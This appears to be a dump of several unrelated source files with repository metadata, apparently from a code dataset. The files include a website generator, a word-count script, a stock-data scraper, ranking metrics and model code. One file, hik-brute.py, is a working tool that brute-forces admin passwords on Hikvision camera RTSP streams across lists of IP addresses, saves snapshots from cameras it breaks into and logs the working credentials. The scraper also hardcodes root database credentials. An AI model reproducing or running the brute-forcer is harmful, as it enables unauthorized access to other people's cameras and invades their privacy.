except IOError as exc:
sys.stderr.write('Cant read data file ' + file + ': ')
sys.stderr.write(str(exc))
sys.exit(-1)
@app.errorhandler(404)
def page_not_found(e):
return render_template('pages/404.html'), 404
app.register_error_handler(404, page_not_found)
@app.route('/api/<path:page_path>')
def api_page(page_path):
path_other, ext = path.splitext(page_path)
if ext == '.html':
return process_api_page(page_path[:-5])
elif path.basename(page_path) == "package-list" or ext:
return respond_with_package_list(page_path)
elif not page_path.endswith('/'):
page_path += '/'
return process_api_page(page_path + 'index')
def process_api_page(page_path):
return render_template(
'api.html',
page=get_api_page(build_mode, page_path)
)
def respond_with_package_list(page_path):
file_path = path.join(root_folder, 'api', page_path)
if not path.exists(file_path):
return make_response(path.basename(page_path) + " not found", 404)
return send_file(file_path, mimetype="text/plain")
@app.route('/assets/<path:path>')
def asset(path):
return send_from_directory('assets', path)
@app.route('/assets/images/tutorials/<path:filename>')
def tutorial_img(filename):
return send_from_directory(path.join('assets', 'images', 'tutorials'), filename)
@freezer.register_generator
def asset():
for filename in walk_directory(path.join(root_folder, "assets")):
yield {'path': filename}
@app.route('/<path:page_path>')
def get_index_page(page_path):
"""
Handle requests which urls don't end with '.html' (for example, '/doc/')
We don't need any generator here, because such urls are equivalent to the same urls
with 'index.html' at the end.
:param page_path: str
:return: str
"""
if not page_path.endswith('/'):
page_path += '/'
return process_page(page_path + 'index')
generate_redirect_pages()
@app.after_request
def add_header(request):
request.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
request.headers["Pragma"] = "no-cache"
request.headers["Expires"] = "0"
request.headers['Cache-Control'] = 'public, max-age=0'
return request
if __name__ == '__main__':
print("\n\n\nRunning new KotlinWebSite generator/dev-mode:\n")
argv_copy = []
for arg in sys.argv:
print("arg: " + arg)
if arg == "--ignore-stdlib":
ignore_stdlib = True
elif arg == "--no-check-links":
build_check_links = False
elif arg == "--editable":
build_contenteditable = True
else:
argv_copy.append(arg)
print("\n\n")
print("ignore_stdlib: " + str(ignore_stdlib))
print("build_check_links: " + str(build_check_links))
print("build_contenteditable: " + str(build_contenteditable))
print("\n\n")
set_replace_simple_code(build_contenteditable)
with (open(path.join(root_folder, "_nav-mapped.yml"), 'w')) as output:
yaml.dump(get_nav_impl(), output)
if len(argv_copy) > 1:
if argv_copy[1] == "build":
build_mode = True
urls = freezer.freeze()
if len(build_errors) > 0:
for error in build_errors:
sys.stderr.write(error + '\n')
sys.exit(-1)
elif argv_copy[1] == "sitemap":
generate_sitemap(get_dist_pages())
# temporary sitemap
generate_temporary_sitemap()
elif argv_copy[1] == "index":
build_search_indices(get_dist_pages())
elif argv_copy[1] == "reference-pdf":
generate_pdf("kotlin-docs.pdf", site_data)
else:
print("Unknown argument: " + argv_copy[1])
sys.exit(1)
else:
app.run(host="0.0.0.0", debug=True, threaded=True, **{"extra_files": {
'/src/data/_nav.yml',
*glob.glob("/src/pages-includes/**/*", recursive=True),
}})
| 32.096715 | 114 | 0.648815 | [
"Apache-2.0"
] | Chinay-Domitrix/kotlin-web-site | kotlin-website.py | 17,589 | Python |
# -*- coding: utf-8 -*-
class TestInvalidPathTweenFactory:
def test_it_400s_if_the_requested_path_isnt_utf8(self, app):
app.get("/%c5", status=400)
| 23.142857 | 64 | 0.697531 | [
"BSD-2-Clause"
] | 13625025773/h | tests/functional/test_tweens.py | 162 | Python |
"""
Simple million word count program.
main idea is Python pairs words
with the number of times
that number appears in the triple quoted string.
Credit to William J. Turkel and Adam Crymble for the word
frequency code used below. I just merged the two ideas.
"""
wordstring = '''SCENE I. Yorkshire. Gaultree Forest.
Enter the ARCHBISHOP OF YORK, MOWBRAY, LORD HASTINGS, and others
ARCHBISHOP OF YORK
What is this forest call'd?
HASTINGS
'Tis Gaultree Forest, an't shall please your grace.
ARCHBISHOP OF YORK
Here stand, my lords; and send discoverers forth
To know the numbers of our enemies.
HASTINGS
We have sent forth already.
ARCHBISHOP OF YORK
'Tis well done.
My friends and brethren in these great affairs,
I must acquaint you that I have received
New-dated letters from Northumberland;
Their cold intent, tenor and substance, thus:
Here doth he wish his person, with such powers
As might hold sortance with his quality,
The which he could not levy; whereupon
He is retired, to ripe his growing fortunes,
To Scotland: and concludes in hearty prayers
That your attempts may overlive the hazard
And fearful melting of their opposite.
MOWBRAY
Thus do the hopes we have in him touch ground
And dash themselves to pieces.
Enter a Messenger
HASTINGS
Now, what news?
Messenger
West of this forest, scarcely off a mile,
In goodly form comes on the enemy;
And, by the ground they hide, I judge their number
Upon or near the rate of thirty thousand.
MOWBRAY
The just proportion that we gave them out
Let us sway on and face them in the field.
ARCHBISHOP OF YORK
What well-appointed leader fronts us here?
Enter WESTMORELAND
MOWBRAY
I think it is my Lord of Westmoreland.
WESTMORELAND
Health and fair greeting from our general,
The prince, Lord John and Duke of Lancaster.
ARCHBISHOP OF YORK
Say on, my Lord of Westmoreland, in peace:
What doth concern your coming?
WESTMORELAND
Then, my lord,
Unto your grace do I in chief address
The substance of my speech. If that rebellion
Came like itself, in base and abject routs,
Led on by bloody youth, guarded with rags,
And countenanced by boys and beggary,
I say, if damn'd commotion so appear'd,
In his true, native and most proper shape,
You, reverend father, and these noble lords
Had not been here, to dress the ugly form
Of base and bloody insurrection
With your fair honours. You, lord archbishop,
Whose see is by a civil peace maintained,
Whose beard the silver hand of peace hath touch'd,
Whose learning and good letters peace hath tutor'd,
Whose white investments figure innocence,
The dove and very blessed spirit of peace,
Wherefore do you so ill translate ourself
Out of the speech of peace that bears such grace,
Into the harsh and boisterous tongue of war;
Turning your books to graves, your ink to blood,
Your pens to lances and your tongue divine
To a trumpet and a point of war?
ARCHBISHOP OF YORK
Wherefore do I this? so the question stands.
Briefly to this end: we are all diseased,
And with our surfeiting and wanton hours
Have brought ourselves into a burning fever,
And we must bleed for it; of which disease
Our late king, Richard, being infected, died.
But, my most noble Lord of Westmoreland,
I take not on me here as a physician,
Nor do I as an enemy to peace
Troop in the throngs of military men;
But rather show awhile like fearful war,
To diet rank minds sick of happiness
And purge the obstructions which begin to stop
Our very veins of life. Hear me more plainly.
I have in equal balance justly weigh'd
What wrongs our arms may do, what wrongs we suffer,
And find our griefs heavier than our offences.
We see which way the stream of time doth run,
And are enforced from our most quiet there
By the rough torrent of occasion;
And have the summary of all our griefs,
When time shall serve, to show in articles;
Which long ere this we offer'd to the king,
And might by no suit gain our audience:
When we are wrong'd and would unfold our griefs,
We are denied access unto his person
Even by those men that most have done us wrong.
The dangers of the days but newly gone,
Whose memory is written on the earth
With yet appearing blood, and the examples
Of every minute's instance, present now,
Hath put us in these ill-beseeming arms,
Not to break peace or any branch of it,
But to establish here a peace indeed,
Concurring both in name and quality.
WESTMORELAND
When ever yet was your appeal denied?
Wherein have you been galled by the king?
What peer hath been suborn'd to grate on you,
That you should seal this lawless bloody book
Of forged rebellion with a seal divine
And consecrate commotion's bitter edge?
ARCHBISHOP OF YORK
My brother general, the commonwealth,
To brother born an household cruelty,
I make my quarrel in particular.
WESTMORELAND
There is no need of any such redress;
Or if there were, it not belongs to you.
MOWBRAY
Why not to him in part, and to us all
That feel the bruises of the days before,
And suffer the condition of these times
To lay a heavy and unequal hand
Upon our honours?
WESTMORELAND
O, my good Lord Mowbray,
Construe the times to their necessities,
And you shall say indeed, it is the time,
And not the king, that doth you injuries.
Yet for your part, it not appears to me
Either from the king or in the present time
That you should have an inch of any ground
To build a grief on: were you not restored
To all the Duke of Norfolk's signories,
Your noble and right well remember'd father's?
MOWBRAY
What thing, in honour, had my father lost,
That need to be revived and breathed in me?
The king that loved him, as the state stood then,
Was force perforce compell'd to banish him:
And then that Harry Bolingbroke and he,
Being mounted and both roused in their seats,
Their neighing coursers daring of the spur,
Their armed staves in charge, their beavers down,
Their eyes of fire sparking through sights of steel
And the loud trumpet blowing them together,
Then, then, when there was nothing could have stay'd
My father from the breast of Bolingbroke,
O when the king did throw his warder down,
His own life hung upon the staff he threw;
Then threw he down himself and all their lives
That by indictment and by dint of sword
Have since miscarried under Bolingbroke.
WESTMORELAND
You speak, Lord Mowbray, now you know not what.
The Earl of Hereford was reputed then
In England the most valiant gentlemen:
Who knows on whom fortune would then have smiled?
But if your father had been victor there,
He ne'er had borne it out of Coventry:
For all the country in a general voice
Cried hate upon him; and all their prayers and love
Were set on Hereford, whom they doted on
And bless'd and graced indeed, more than the king.
But this is mere digression from my purpose.
Here come I from our princely general
To know your griefs; to tell you from his grace
That he will give you audience; and wherein
It shall appear that your demands are just,
You shall enjoy them, every thing set off
That might so much as think you enemies.
MOWBRAY
But he hath forced us to compel this offer;
And it proceeds from policy, not love.
WESTMORELAND
Mowbray, you overween to take it so;
This offer comes from mercy, not from fear:
For, lo! within a ken our army lies,
Upon mine honour, all too confident
To give admittance to a thought of fear.
Our battle is more full of names than yours,
Our men more perfect in the use of arms,
Our armour all as strong, our cause the best;
Then reason will our heart should be as good
Say you not then our offer is compell'd.
MOWBRAY
Well, by my will we shall admit no parley.
WESTMORELAND
That argues but the shame of your offence:
A rotten case abides no handling.
HASTINGS
Hath the Prince John a full commission,
In very ample virtue of his father,
To hear and absolutely to determine
Of what conditions we shall stand upon?
WESTMORELAND
That is intended in the general's name:
I muse you make so slight a question.
ARCHBISHOP OF YORK
Then take, my Lord of Westmoreland, this schedule,
For this contains our general grievances:
Each several article herein redress'd,
All members of our cause, both here and hence,
That are insinew'd to this action,
Acquitted by a true substantial form
And present execution of our wills
To us and to our purposes confined,
We come within our awful banks again
And knit our powers to the arm of peace.
WESTMORELAND
This will I show the general. Please you, lords,
In sight of both our battles we may meet;
And either end in peace, which God so frame!
Or to the place of difference call the swords
Which must decide it.
ARCHBISHOP OF YORK
My lord, we will do so.
Exit WESTMORELAND
MOWBRAY
There is a thing within my bosom tells me
That no conditions of our peace can stand.
HASTINGS
Fear you not that: if we can make our peace
Upon such large terms and so absolute
As our conditions shall consist upon,
Our peace shall stand as firm as rocky mountains.
MOWBRAY
Yea, but our valuation shall be such
That every slight and false-derived cause,
Yea, every idle, nice and wanton reason
Shall to the king taste of this action;
That, were our royal faiths martyrs in love,
We shall be winnow'd with so rough a wind
That even our corn shall seem as light as chaff
And good from bad find no partition.
ARCHBISHOP OF YORK
No, no, my lord. Note this; the king is weary
Of dainty and such picking grievances:
For he hath found to end one doubt by death
Revives two greater in the heirs of life,
And therefore will he wipe his tables clean
And keep no tell-tale to his memory
That may repeat and history his loss
To new remembrance; for full well he knows
He cannot so precisely weed this land
As his misdoubts present occasion:
His foes are so enrooted with his friends
That, plucking to unfix an enemy,
He doth unfasten so and shake a friend:
So that this land, like an offensive wife
That hath enraged him on to offer strokes,
As he is striking, holds his infant up
And hangs resolved correction in the arm
That was uprear'd to execution.
HASTINGS
Besides, the king hath wasted all his rods
On late offenders, that he now doth lack
The very instruments of chastisement:
So that his power, like to a fangless lion,
May offer, but not hold.
ARCHBISHOP OF YORK
'Tis very true:
And therefore be assured, my good lord marshal,
If we do now make our atonement well,
Our peace will, like a broken limb united,
Grow stronger for the breaking.
MOWBRAY
Be it so.
Here is return'd my Lord of Westmoreland.
Re-enter WESTMORELAND
WESTMORELAND
The prince is here at hand: pleaseth your lordship
To meet his grace just distance 'tween our armies.
MOWBRAY
Your grace of York, in God's name then, set forward.
ARCHBISHOP OF YORK
Before, and greet his grace: my lord, we come.
Exeunt'''
wordlist = wordstring.split()
wordfreq = [wordlist.count(w) for w in wordlist]
print("String\n {} \n".format(wordstring))
print("List\n {} \n".format(str(wordlist)))
print("Frequencies\n {} \n".format(str(wordfreq)))
print("Pairs\n {}".format(str(dict(zip(wordlist, wordfreq)))))
print("Edit I made to show how to pull from IntellijIdea")
print("Adding my two cents here")
| 36.154605 | 64 | 0.786189 | [
"MIT"
] | onepseudoxy/Python | CountMillionCharacter.py | 10,991 | Python |
""" YQL out mkt cap and currency to fill out yahoo table """
""" TODO: retreive lists of 100 symbols from database and update"""
""" Results are intented to use while matching yahoo tickers, which one has mkt cap? which ones has sector? """
import mysql.connector
import stockretriever
import sys
import time
from random import randint
cnx = mysql.connector.connect(user='root', password='root', database='yahoo')
cursor = cnx.cursor()
sleeptime = 10
add_market_cap = ("INSERT INTO stocks "
"(symbol, market_cap, currency) "
"VALUES (%s, %s, %s) "
"ON DUPLICATE KEY UPDATE market_cap=VALUES(market_cap), currency=VALUES(currency)")
get_new_symbols = """SELECT symbol
FROM yahoo.stocks
WHERE market_cap is NULL
and currency is NULL"""
try:
cursor.execute(get_new_symbols)
except mysql.connector.errors.IntegrityError, e:
print(e)
for result in cursor.fetchall():
for symbol in result:
data = []
market_cap = ""
currency = ""
try:
data = stockretriever.get_current_info([symbol])
except TypeError as e:
#print "Typerror {0}: {1}".format(e.errno, e.strerror)
print "Type error, could not fetch current info on ", symbol
except Exception as e:
print(e)
try:
currency = data['Currency']
market_cap = data['MarketCapitalization']
except Exception as e:
print "No currency or mkt cap error", e
continue
data_company = (symbol, market_cap, currency)
try:
cursor.execute(add_market_cap, data_company)
except mysql.connector.errors.IntegrityError, e:
print(e)
continue
try:
print "Success updating", symbol, currency, market_cap
except UnicodeEncodeError as e:
print e
cnx.commit()
time.sleep(randint(0,sleeptime))
cursor.close()
cnx.close()
| 27.805556 | 111 | 0.618881 | [
"BSD-3-Clause"
] | pettersoderlund/fondout | script/StockScraper-master/update_market_cap_yahoo.py | 2,002 | Python |
import os
import time
import datetime
import socket
import platform
import sys
from multiprocessing.dummy import Pool as ThreadPool
from colorama import Fore, Back, Style
def rtspbrute(ip1):
log=open("logs",'r')
if ip1 not in log:
flag=0
ip1 = ip1[:-1]
os.system("mkdir -p Hikvision/%s 2> /dev/null"%(str(ip1).strip()))
dat=datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
os.system("mkdir Hikvision/%s/%s 2>/dev/null" %(ip1.strip(),dat.strip()))
for passw in passread:
chann=1
passw = passw[:-1]
print Fore.YELLOW+"\nRunning '%s' with password '%s'\n" %(str(ip1).strip(), str(passw))
os.system("ffmpeg -v quiet -stimeout 7000000 -rtsp_transport tcp -y -i rtsp://admin:%s@%s:554/Streaming/Channels/101/ -ss 00:00:01.50 -vframes 1 Hikvision/%s/%s_temp.jpg " %(str(passw).strip(),str(ip1).strip(),str(ip1).strip(),ip1.strip()))
if os.path.exists("Hikvision/%s/%s_temp.jpg" %(str(ip1).strip(),str(ip1).strip())):
print Fore.GREEN + "Found Access of %s with password %s" %(str(ip1).strip(), str(passw))
print(Style.RESET_ALL)
access = open("hik-access-list","a")
print >> access, ("rtsp://admin:%s@%s:554/Streaming/Channels/101/" %(str(passw),str(ip1).strip()))
access.close()
log = open("logs","a")
print >> log, (str(ip1))
flag=1
while chann<=3:
print "Trying to take screenshot of Channel No. "+str(chann)
os.system("ffmpeg -v quiet -stimeout 7000000 -rtsp_transport tcp -y -i rtsp://admin:%s@%s:554/Streaming/Channels/%s01/ -ss 00:00:01.50 -vframes 1 Hikvision/%s/%s/%s_%s.jpg " %(str(passw).strip(),str(ip1).strip(),str(chann),str(ip1).strip(),str(dat).strip(),ip1.strip(),str(chann)) )
chann=chann+1
if flag == 1:
break
return 1
if __name__ == "__main__":
iplist = sys.argv[1]
f = open(iplist,"r")
ip = f.readlines()
passlist = sys.argv[2]
password = open(passlist,"r")
passread = password.readlines()
access = open("hik-access-list","w")
access.close()
pool = ThreadPool(100)
results = pool.map(rtspbrute, ip)
pool.close()
pool.join()
os.system("find Hikvision/ -type d -empty -delete")
os.system("python pics-viewer.py Hikvision")
os.system("mv index.html Hikvision.html")
print Fore.CYAN+"\n\nFINISHED\n"
| 38.413793 | 287 | 0.658887 | [
"MIT"
] | haka110/Cam-Brute | hik-brute.py | 2,228 | Python |
# Copyright (c) 2014 eBay Software Foundation
# Copyright 2015 HP Software, LLC
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.utils.translation import ugettext_lazy as _
import horizon
from openstack_dashboard.dashboards.project import dashboard
class Clusters(horizon.Panel):
name = _("Clusters")
slug = 'database_clusters'
permissions = ('openstack.services.database',
'openstack.services.object-store',)
dashboard.Project.register(Clusters)
| 33.677419 | 78 | 0.733716 | [
"Apache-2.0"
] | NeCTAR-RC/trove-dashboard | trove_dashboard/content/database_clusters/panel.py | 1,044 | Python |
# Generated by Django 2.2.1 on 2019-07-06 21:53
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('publish', '0031_bundle_description'),
]
operations = [
migrations.CreateModel(
name='Docset',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('docset_id', models.CharField(max_length=255)),
('name', models.CharField(default='', max_length=255)),
],
),
]
| 26.863636 | 114 | 0.57868 | [
"BSD-3-Clause"
] | SFDO-Tooling/sfdoc | sfdoc/publish/migrations/0032_docset.py | 591 | Python |
from functools import partial
from g_code_test_data.http.http_settings import HTTP_SETTINGS
from g_code_test_data.g_code_configuration import HTTPGCodeConfirmConfig
from robot_server.service.legacy.routers.modules import post_serial_command
from robot_server.service.legacy.models.modules import SerialCommand
from opentrons.hardware_control.emulation.magdeck import SERIAL as SERIAL_NUM
MAGDECK_CALIBRATE = HTTPGCodeConfirmConfig(
name='magdeck_calibrate',
executable=partial(
post_serial_command,
command=SerialCommand(command_type='calibrate'),
serial=SERIAL_NUM,
),
settings=HTTP_SETTINGS,
)
MAGDECK_DEACTIVATE = HTTPGCodeConfirmConfig(
name='magdeck_deactivate',
executable=partial(
post_serial_command,
command=SerialCommand(command_type='deactivate'),
serial=SERIAL_NUM,
),
settings=HTTP_SETTINGS,
)
MAGDECK_ENGAGE = HTTPGCodeConfirmConfig(
name='magdeck_engage',
executable=partial(
post_serial_command,
command=SerialCommand(command_type='engage', args=[5.1]),
serial=SERIAL_NUM,
),
settings=HTTP_SETTINGS,
)
MAGDECK_CONFIGURATIONS = [
MAGDECK_CALIBRATE,
MAGDECK_DEACTIVATE,
MAGDECK_ENGAGE,
] | 29.452381 | 77 | 0.760711 | [
"Apache-2.0"
] | MarcelRobitaille/opentrons | g-code-testing/g_code_test_data/http/modules/magdeck.py | 1,237 | Python |
# Pyrogram - Telegram MTProto API Client Library for Python
# Copyright (C) 2017-2018 Dan Tès <https://github.com/delivrance>
#
# This file is part of Pyrogram.
#
# Pyrogram is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pyrogram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Pyrogram. If not, see <http://www.gnu.org/licenses/>.
from io import BytesIO
from pyrogram.api.core import *
class ChannelAdminLogEventActionTogglePreHistoryHidden(Object):
"""Attributes:
ID: ``0x5f5c95f1``
Args:
new_value: ``bool``
"""
ID = 0x5f5c95f1
def __init__(self, new_value: bool):
self.new_value = new_value # Bool
@staticmethod
def read(b: BytesIO, *args) -> "ChannelAdminLogEventActionTogglePreHistoryHidden":
# No flags
new_value = Bool.read(b)
return ChannelAdminLogEventActionTogglePreHistoryHidden(new_value)
def write(self) -> bytes:
b = BytesIO()
b.write(Int(self.ID, False))
# No flags
b.write(Bool(self.new_value))
return b.getvalue()
| 29.12963 | 86 | 0.686586 | [
"MIT"
] | block1o1/CryptoPredicted | ENV/lib/python3.5/site-packages/pyrogram/api/types/channel_admin_log_event_action_toggle_pre_history_hidden.py | 1,574 | Python |
# https://github.com/iliaschalkidis/lmtc-eurlex57k/blob/master/metrics.py
from sklearn.metrics import accuracy_score
from sklearn.metrics import precision_score
from sklearn.metrics import recall_score
from sklearn.metrics import f1_score
import numpy as np
def mean_precision_k(y_true, y_score, k=10):
"""Mean precision at rank k
Parameters
----------
y_true : array-like, shape = [n_samples]
Ground truth (true relevance labels).
y_score : array-like, shape = [n_samples]
Predicted scores.
k : int
Rank.
Returns
-------
mean precision @k : float
"""
p_ks = []
for y_t, y_s in zip(y_true, y_score):
if np.sum(y_t == 1):
p_ks.append(ranking_precision_score(y_t, y_s, k=k))
return np.mean(p_ks)
def mean_recall_k(y_true, y_score, k=10):
"""Mean recall at rank k
Parameters
----------
y_true : array-like, shape = [n_samples]
Ground truth (true relevance labels).
y_score : array-like, shape = [n_samples]
Predicted scores.
k : int
Rank.
Returns
-------
mean recall @k : float
"""
r_ks = []
for y_t, y_s in zip(y_true, y_score):
if np.sum(y_t == 1):
r_ks.append(ranking_recall_score(y_t, y_s, k=k))
return np.mean(r_ks)
def mean_ndcg_score(y_true, y_score, k=10, gains="exponential"):
"""Normalized discounted cumulative gain (NDCG) at rank k
Parameters
----------
y_true : array-like, shape = [n_samples]
Ground truth (true relevance labels).
y_score : array-like, shape = [n_samples]
Predicted scores.
k : int
Rank.
gains : str
Whether gains should be "exponential" (default) or "linear".
Returns
-------
Mean NDCG @k : float
"""
ndcg_s = []
for y_t, y_s in zip(y_true, y_score):
if np.sum(y_t == 1):
ndcg_s.append(ndcg_score(y_t, y_s, k=k, gains=gains))
return np.mean(ndcg_s)
def mean_rprecision_k(y_true, y_score, k=10):
"""Mean precision at rank k
Parameters
----------
y_true : array-like, shape = [n_samples]
Ground truth (true relevance labels).
y_score : array-like, shape = [n_samples]
Predicted scores.
k : int
Rank.
Returns
-------
mean precision @k : float
"""
p_ks = []
for y_t, y_s in zip(y_true, y_score):
if np.sum(y_t == 1):
p_ks.append(ranking_rprecision_score(y_t, y_s, k=k))
return np.mean(p_ks)
def ranking_recall_score(y_true, y_score, k=10):
# https://ils.unc.edu/courses/2013_spring/inls509_001/lectures/10-EvaluationMetrics.pdf
"""Recall at rank k
Parameters
----------
y_true : array-like, shape = [n_samples]
Ground truth (true relevance labels).
y_score : array-like, shape = [n_samples]
Predicted scores.
k : int
Rank.
Returns
-------
precision @k : float
"""
unique_y = np.unique(y_true)
if len(unique_y) == 1:
return ValueError("The score cannot be approximated.")
elif len(unique_y) > 2:
raise ValueError("Only supported for two relevance levels.")
pos_label = unique_y[1]
n_pos = np.sum(y_true == pos_label)
order = np.argsort(y_score)[::-1]
y_true = np.take(y_true, order[:k])
n_relevant = np.sum(y_true == pos_label)
return float(n_relevant) / n_pos
def ranking_precision_score(y_true, y_score, k=10):
"""Precision at rank k
Parameters
----------
y_true : array-like, shape = [n_samples]
Ground truth (true relevance labels).
y_score : array-like, shape = [n_samples]
Predicted scores.
k : int
Rank.
Returns
-------
precision @k : float
"""
unique_y = np.unique(y_true)
if len(unique_y) == 1:
return ValueError("The score cannot be approximated.")
elif len(unique_y) > 2:
raise ValueError("Only supported for two relevance levels.")
pos_label = unique_y[1]
order = np.argsort(y_score)[::-1]
y_true = np.take(y_true, order[:k])
n_relevant = np.sum(y_true == pos_label)
return float(n_relevant) / k
def ranking_rprecision_score(y_true, y_score, k=10):
"""Precision at rank k
Parameters
----------
y_true : array-like, shape = [n_samples]
Ground truth (true relevance labels).
y_score : array-like, shape = [n_samples]
Predicted scores.
k : int
Rank.
Returns
-------
precision @k : float
"""
unique_y = np.unique(y_true)
if len(unique_y) == 1:
return ValueError("The score cannot be approximated.")
elif len(unique_y) > 2:
raise ValueError("Only supported for two relevance levels.")
pos_label = unique_y[1]
n_pos = np.sum(y_true == pos_label)
order = np.argsort(y_score)[::-1]
y_true = np.take(y_true, order[:k])
n_relevant = np.sum(y_true == pos_label)
# Divide by min(n_pos, k) such that the best achievable score is always 1.0.
return float(n_relevant) / min(k, n_pos)
def average_precision_score(y_true, y_score, k=10):
"""Average precision at rank k
Parameters
----------
y_true : array-like, shape = [n_samples]
Ground truth (true relevance labels).
y_score : array-like, shape = [n_samples]
Predicted scores.
k : int
Rank.
Returns
-------
average precision @k : float
"""
unique_y = np.unique(y_true)
if len(unique_y) == 1:
return ValueError("The score cannot be approximated.")
elif len(unique_y) > 2:
raise ValueError("Only supported for two relevance levels.")
pos_label = unique_y[1]
n_pos = np.sum(y_true == pos_label)
order = np.argsort(y_score)[::-1][:min(n_pos, k)]
y_true = np.asarray(y_true)[order]
score = 0
for i in range(len(y_true)):
if y_true[i] == pos_label:
# Compute precision up to document i
# i.e, percentage of relevant documents up to document i.
prec = 0
for j in range(0, i + 1):
if y_true[j] == pos_label:
prec += 1.0
prec /= (i + 1.0)
score += prec
if n_pos == 0:
return 0
return score / n_pos
def dcg_score(y_true, y_score, k=10, gains="exponential"):
"""Discounted cumulative gain (DCG) at rank k
Parameters
----------
y_true : array-like, shape = [n_samples]
Ground truth (true relevance labels).
y_score : array-like, shape = [n_samples]
Predicted scores.
k : int
Rank.
gains : str
Whether gains should be "exponential" (default) or "linear".
Returns
-------
DCG @k : float
"""
order = np.argsort(y_score)[::-1]
y_true = np.take(y_true, order[:k])
if gains == "exponential":
gains = 2 ** y_true - 1
elif gains == "linear":
gains = y_true
else:
raise ValueError("Invalid gains option.")
# highest rank is 1 so +2 instead of +1
discounts = np.log2(np.arange(len(y_true)) + 2)
return np.sum(gains / discounts)
def ndcg_score(y_true, y_score, k=10, gains="exponential"):
"""Normalized discounted cumulative gain (NDCG) at rank k
Parameters
----------
y_true : array-like, shape = [n_samples]
Ground truth (true relevance labels).
y_score : array-like, shape = [n_samples]
Predicted scores.
k : int
Rank.
gains : str
Whether gains should be "exponential" (default) or "linear".
Returns
-------
NDCG @k : float
"""
best = dcg_score(y_true, y_true, k, gains)
actual = dcg_score(y_true, y_score, k, gains)
return actual / best
# Alternative API.
def dcg_from_ranking(y_true, ranking):
"""Discounted cumulative gain (DCG) at rank k
Parameters
----------
y_true : array-like, shape = [n_samples]
Ground truth (true relevance labels).
ranking : array-like, shape = [k]
Document indices, i.e.,
ranking[0] is the index of top-ranked document,
ranking[1] is the index of second-ranked document,
...
k : int
Rank.
Returns
-------
DCG @k : float
"""
y_true = np.asarray(y_true)
ranking = np.asarray(ranking)
rel = y_true[ranking]
gains = 2 ** rel - 1
discounts = np.log2(np.arange(len(ranking)) + 2)
return np.sum(gains / discounts)
def ndcg_from_ranking(y_true, ranking):
"""Normalized discounted cumulative gain (NDCG) at rank k
Parameters
----------
y_true : array-like, shape = [n_samples]
Ground truth (true relevance labels).
ranking : array-like, shape = [k]
Document indices, i.e.,
ranking[0] is the index of top-ranked document,
ranking[1] is the index of second-ranked document,
...
k : int
Rank.
Returns
-------
NDCG @k : float
"""
k = len(ranking)
best_ranking = np.argsort(y_true)[::-1]
best = dcg_from_ranking(y_true, best_ranking[:k])
return dcg_from_ranking(y_true, ranking) / best
def colwise_accuracy(y_true,y_pred):
y_pred=y_pred.T
y_true=y_true.T
acc_list=[]
for cate in range(0,y_pred.shape[0]):
acc_list.append(accuracy_score(y_pred[cate],y_true[cate]))
return sum(acc_list)/len(acc_list)
def calculate_metrics(pred, target, threshold=0.5):
pred = np.array(pred > threshold, dtype=float)
return {'Accuracy': accuracy_score(y_true=target, y_pred=pred),
'Column-wise Accuracy': colwise_accuracy(y_true=target, y_pred=pred),
'micro/precision': precision_score(y_true=target, y_pred=pred, average='micro'),
'micro/recall': recall_score(y_true=target, y_pred=pred, average='micro'),
'micro/f1': f1_score(y_true=target, y_pred=pred, average='micro'),
'macro/precision': precision_score(y_true=target, y_pred=pred, average='macro'),
'macro/recall': recall_score(y_true=target, y_pred=pred, average='macro'),
'macro/f1': f1_score(y_true=target, y_pred=pred, average='macro'),
'samples/precision': precision_score(y_true=target, y_pred=pred, average='samples'),
'samples/recall': recall_score(y_true=target, y_pred=pred, average='samples'),
'samples/f1': f1_score(y_true=target, y_pred=pred, average='samples'),
} | 28.360434 | 96 | 0.602389 | [
"Apache-2.0"
] | myeonghak/kobert-multi-label-VOC-classifier | voc_classifier/metrics_for_multilabel.py | 10,465 | Python |
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function
import logging
import time
import unittest
import numpy as np
import paddle.fluid as fluid
from paddle.fluid.dygraph.dygraph_to_static import ProgramTranslator
from paddle.fluid.dygraph.base import to_variable
from paddle.fluid.dygraph.jit import declarative
from paddle.fluid.dygraph.nn import Embedding
from paddle.fluid.optimizer import SGDOptimizer
PRINT_STEP = 20
SEED = 2020
program_translator = ProgramTranslator()
class SimpleLSTMRNN(fluid.Layer):
def __init__(self,
hidden_size,
num_steps,
num_layers=2,
init_scale=0.1,
dropout=None):
super(SimpleLSTMRNN, self).__init__()
self._hidden_size = hidden_size
self._num_layers = num_layers
self._init_scale = init_scale
self._dropout = dropout
self._num_steps = num_steps
self.cell_array = []
self.hidden_array = []
self.weight_1_arr = []
self.weight_2_arr = []
self.bias_arr = []
self.mask_array = []
for i in range(self._num_layers):
weight_1 = self.create_parameter(
attr=fluid.ParamAttr(
initializer=fluid.initializer.UniformInitializer(
low=-self._init_scale, high=self._init_scale)),
shape=[self._hidden_size * 2, self._hidden_size * 4],
dtype="float32",
default_initializer=fluid.initializer.UniformInitializer(
low=-self._init_scale, high=self._init_scale))
self.weight_1_arr.append(self.add_parameter('w_%d' % i, weight_1))
